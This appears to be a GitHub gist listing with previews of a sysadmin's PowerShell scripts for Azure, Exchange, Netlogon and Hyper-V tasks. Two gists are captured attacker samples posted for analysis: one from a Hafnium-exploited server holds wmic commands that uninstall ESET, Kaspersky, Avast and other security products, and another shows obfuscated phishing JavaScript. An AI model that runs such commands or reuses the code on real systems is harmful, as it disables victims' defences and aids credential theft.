
technion / AutorunsVT.ps1
Created Apr 23, 2021
Review CSV file from autorunsc.exe a and handle Virustotal detections
$autorunsCsv = "\AutorunsOutput.csv"
$autorunsArray = Import-Csv $autorunsCsv
Foreach ($item in $autorunsArray) {
$detection = $item.'VT detection'
if ($detection -eq "" -or $detection -eq 'Unknown') {
continue
}
Write-Output $detection
technion / Malicious.ps1
Created Mar 20, 2021
RE (reverse engineering) on a Hafnium-exploited server
$v='ipc';
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
technion / LicenseManagement.ps1
Created Nov 13, 2020
Office 365 license management
Set-StrictMode -Version 2
# Connect first
# Connect-AzureAD
function Get-LicencesforUser
{
param([object]$user)
# $user should be populated with
# $user = Get-AzureADUser -ObjectId username@domain.com
technion / tank.wa
Created Nov 12, 2020
Warlock tanking weak aura
!WA:2!1zvZUTTrq4YOwKc1IcB3a30FqbtBtacqRQLsIDQrqqfTLtuJSTcLSDcGrLwYDL42qUC7UlTLuVjKd5SEe0HCOON0JGFcim6tGrFc8lq7SKuYQUUxKwoC2DN5B(MVHgBTuWs4LWVX3jsseT6Bmjiet8Rk3JrvELqCQNO3UD6ijkJjyQK7J63K0tDnr)PwrmxVqr9qkt5SrLDAwXEItOateBe6hk(PC5Yvp3kfEWejkGO3AKG0UuKW)AN7GCFvxryedN6AIFx6NZFfHWll5exLnsrd9gNeGT4iLh)wGDFF53JeUigHhEmKcsfsrA56rKQcbLSWePl)PLzm4ACjsZgEiC4XorcMPGiPsL0KYmD9qktCKGY6AQ8iMnpgmwjGteHcPjH5c7wrefgkcv6OGzy1jKP4lSLGoW85riSaPqMnB64kc5T6x)DxPW9lEUknDpqG4BdrT9g1kVD9HsYVgbhjjhFXoHcskcKHm8vRQVOoixYHLX4qM8WdiOxvosGKhwxNGjl3MGPOdtTQ)9ENktYRxKwuYXxakNLX)sKurWe82uM3y4MGaVzFoXI6gYsl0aC1ks(8rAlvz66j)gUHH(WzX0H0MujYXNG9gj9rmLolCQUtJQBwzmSdmvJfY8ISen(ZMekOewkgnC)k2nRUr5ANKYhsJTpWcfPGYOk09iIqc(9(F7DNsTQch6nV2h)3wdcddmUief9(RfkfrXtw5(LTxBn7JSDWdDdd4qnu6LX3sI)pX(ykw5vK)5ZXwBb4Cas1INTWwrdiqjZnj8x1g4mc1(Ia4WqDj87E7Ifsyw7auwZh)y7eIcb)Ohz(DMLFYtS31SAdZgpTAtUz2EMEdflaeoLEFzwSyHmYjt9sbOFPgLFj)w)N9n7cZmfV(yCyRm3ABrH(X8oDG)KE5h3H2JGpqNOV(dVaLudm4lCrtvkE)EWALpLb4)EnRvDNk8BaHickxqFI1mN9olfe1wWahMVGLpDWaKaB2e4dkkFKK43jTn3A3Mn3DBB3Pn4gos
technion / Scan-Netlogon-Secure.ps1
Last active Aug 16, 2020
Search domain controllers for events relating to Netlogon vulnerability
# More information: https://support.microsoft.com/en-au/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc
Set-StrictMode -Version 2
# Fetch all Domain Controllers. Use this pattern to fetch from all sites.
$addomain = Get-ADDomain
$controllers = Get-ADComputer -filter * -SearchBase "OU=Domain Controllers,$($addomain.DistinguishedName)"
foreach ($dc in $controllers) {
# Errors are ignored so as not to throw an exception if there are no such logs found
Get-WinEvent -FilterHashtable @{logname='system'; id=5827,5828,5829,5830,5831} -ComputerName $dc.Name -ErrorAction Ignore
technion / phishing.js
Last active Aug 12, 2020
blog of phishing code
'use strict';
/** @type {!Array} */
var _0xd60a = ["call", "unknown BTYPE: ", "innerHTML", "lazy", "invalid code length: ", "subarray", "createElement", "invalid compression type", "decompress", "input buffer is broken", "POSITIVE_INFINITY", "index", "verify", "charCodeAt", "bufferSize", "invalid uncompressed block header: LEN", "var ", "compile", "fromCodePoint", "finish", "bufferType", "shift", "compressionType", "input", "Zlib.Inflate.prototype.decompress", "invalid inflate mode", "slice", "NONE", "appendChild", "length", "string",
"Zlib.Inflate", "textContent", "prototype", "Zlib.Deflate.compress", "resize", "number", "invalid index", "documentElement", "buffer", "undefined", "trim", "unsupported compression type", "keys", "constructor", "Inflate", "unsupported compression method", "a9ae92d3-ee4f-4bc1-a8c5-7cff21373a99", "split", 'return /" + this + "/', "invalid adler-32 checksum", "getParent", "close", "invalid length: ", "push", "fromCharCode", "invalid code: ", "Zlib.Deflate.CompressionType", "write"
technion / Hyper-V VM Use Report.ps1
Created Jul 14, 2020
Report on whole VM cluster in csv format
$nodelist = Get-Clusternode -Cluster cls
$vmdata = @()
foreach ($node in $nodelist) {
$vmList = Get-VM -ComputerName $node.Name | where { $_.name -notlike '*_replica' }
foreach ($vm in $vmList) {
$UtilSummaryObj = New-Object System.Object
View User duplicate provisioning.ps1
Set-StrictMode -Version 2
Add-Type -AssemblyName 'System.Web'
$adusers = Get-ADGroupMember "Team"
foreach ($user in $adusers) {
$newname = "$($user.Samaccountname).delegate"
$password = [System.Web.Security.Membership]::GeneratePassword(12, 0)
$secPw = ConvertTo-SecureString -String $password -AsPlainText -Force
technion / AzureGroups.ps1
Created Apr 30, 2020
Adds all AzureAD users with a certain license to a group
$skus = Get-AzureADSubscribedSku
# Exchange Online E1
$skue1 = ( $skus | where { $_.skupartnumber -eq 'EXCHANGESTANDARD' } ).SkuID
$members = Get-AzureADUser -All $true
foreach($member in $members) {
if ($member.ImmutableId -eq $null) {
# Cloud user - skip
technion / Check-CVE-2020-0688.ps1
Created Apr 7, 2020
Scan Exchange server for CVE-2020-0688 vulnerability
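# Looks for a validationKey entry in the web.config of the Exchange ECP web
# application and reports the server as vulnerable to CVE-2020-0688 when one
# is present.
# NOTE(review): the presence of the string "validationKey" is the only signal
# used here - confirm against the server's patch level before relying on a
# "not vulnerable" result.
Set-StrictMode -Version 2

$path = Get-WebApplication ecp
# Keep only the ECP application(s) whose physical path contains 'Client'.
# @() guarantees an array, so zero, one or several matches are all handled.
$ecppath = @($path | Where-Object { $_.PhysicalPath -match 'Client' })

$vulnerable = $false
# Set when the check could not be performed; a failed lookup must not be
# reported as a clean "not vulnerable" result.
$inconclusive = ($ecppath.Count -eq 0)

foreach ($app in $ecppath) {
    $config = Join-Path $app.PhysicalPath 'web.config'
    try {
        # -ErrorAction Stop turns a missing or unreadable file into a caught
        # error instead of an empty result that would read as "no key found".
        if (Select-String -Pattern 'validationKey' -LiteralPath $config -Quiet -ErrorAction Stop) {
            $vulnerable = $true
        }
    } catch {
        Write-Warning "Cannot read ${config}: $($_.Exception.Message)"
        $inconclusive = $true
    }
}

if ($vulnerable) {
    Write-Host "Server is vulnerable" -ForegroundColor Yellow
} elseif ($inconclusive) {
    Write-Warning "Unable to determine vulnerability status: ECP web.config was not found or could not be read"
} else {
    Write-Host "Server is not vulnerable"
}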